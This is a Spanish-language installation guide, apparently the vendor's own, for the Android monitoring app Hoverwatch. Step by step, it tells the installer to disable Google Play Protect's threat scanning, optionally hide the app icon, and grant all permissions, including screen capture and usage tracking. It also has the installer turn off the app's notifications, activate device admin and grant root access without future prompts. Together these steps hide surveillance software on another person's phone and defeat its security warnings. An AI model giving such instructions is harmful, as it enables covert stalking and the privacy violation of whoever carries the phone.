Como instalar Hoverwatch para Android

Video instructivo:

Instrucciones en texto:

1. Prepara el teléfono donde lo vas a instalar:

Para evitar que Android haga preguntas acerca de la actividad del programa de monitoreo:

Abre la aplicación "Google Play Store" -> Toca el botón de Menú -> Selecciona "Play Protect" -> Toca el ícono de Ajustes / Settings .
Deshabilita "Escanear el dispositivo por amenazas de seguridad / Scan device for security threats" y "Mejorar detección de apps maliciosas / Improve harmful app detections".

2. Descarga la App

Abre tu navegador. Activa el "Modo incógnito / Secret mode", si lo deseas. Escribe hoverwatch.com. Ingresa tu email y contraseña (Crea una cuenta en Hoverwatch) y haz clic en "REGISTRARSE DE FORMA GRATUITA / SIGN UP FREE".

Selecciona Android y haz clic en el enlace de descarga.

Haz clic en "Descarga / Download".

Haz clic en "Abrir Archivo / Open file".

Si no puedes encontrar la página de "Agregar dispositivo / Add Device" haz clic en el botón de "Menú" luego haz clic en "Agregar dispositivo / Add Device".

3. Instalar la app

Toca "Configuración / Settings" y permite instalar la aplicación.

Pulsa "Atrás / Back". Pulsa Instalar / Install.

Si el botón "Abrir" no está activo sigue las instrucciones.

Selecciona la opción de instalación y pulsa Aceptar / OK.

Dependiendo de tu elección, puedes elegir ocultar el icono de Hoverwatch.

Aceptar los Términos legales / Legal terms.

Ingrese su nombre de usuario y contraseña de Hoverwatch. Pulse Activar / Activate.

Activar todos los permisos de la aplicación:

Toca "SÍ / YES" y toca "Permitir / Allow" para activar todos los permisos.

Deshabilitar la optimización de la batería:

Toque el botón "Sí / Yes". Pulse el botón "Permitir / Allow".

Activar el permiso "Aparecer en la parte superior / Appear on top":

Toque el botón "Sí / Yes", habilite "Permitir permiso / Allow permission". Pulse el botón "Atrás / Back".

Permitir que la aplicación capture la pantalla:

Pulse "SÍ / YES".

Habilitar el elemento "No volver a mostrar / Don`t show again". Pulse el botón "Comenzar ahora / Start now".

Activar "Seguimiento de uso / Usage tracking":

Toque "Sí / Yes", busque y toque "Sync Service", activa "Permitir seguimiento de uso / Allow usage tracking".

002.jpg 003.jpg

Toque atrás / back" dos veces y regresa a la aplicación Hoverwatch.

Desactivar las notificaciones de aplicaciones:

Toque el botón "Sí / Yes". Desactivar "Mostrar notificaciones / Show notifications".

5.1.jpg 5.2.jpg

Toque el botón "atrás / back" y regresa a la aplicación Hoverwatch.

Activar el Administrador del dispositivo / Device admin:

Toque el botón "Sí / Yes" en el nuevo mensaje toque el botón "Activar / Activate" button.

4. Ver configuraciones adicionales

Si su teléfono no ha sido rooteado, está todo listo.

Si su teléfono ha sido rooteado, durante la instalación, el programa le hará un par de preguntas más.

Cuando se le pregunte si desea reiniciar, responda "Sí".

En "Solicitud de permiso de Root", asegúrese de marcar la casilla "No volver a preguntar", luego haga clic en "Autorizar".

Compruebe si su dispositivo está correctamente enraizado por algún Root Checker gratuito de Google Play Store.

El programa comenzará a funcionar después de reiniciar su computadora.

En 5-6 minutos, la información del dispositivo aparecerá en su cuenta de Hoverwatch.

show up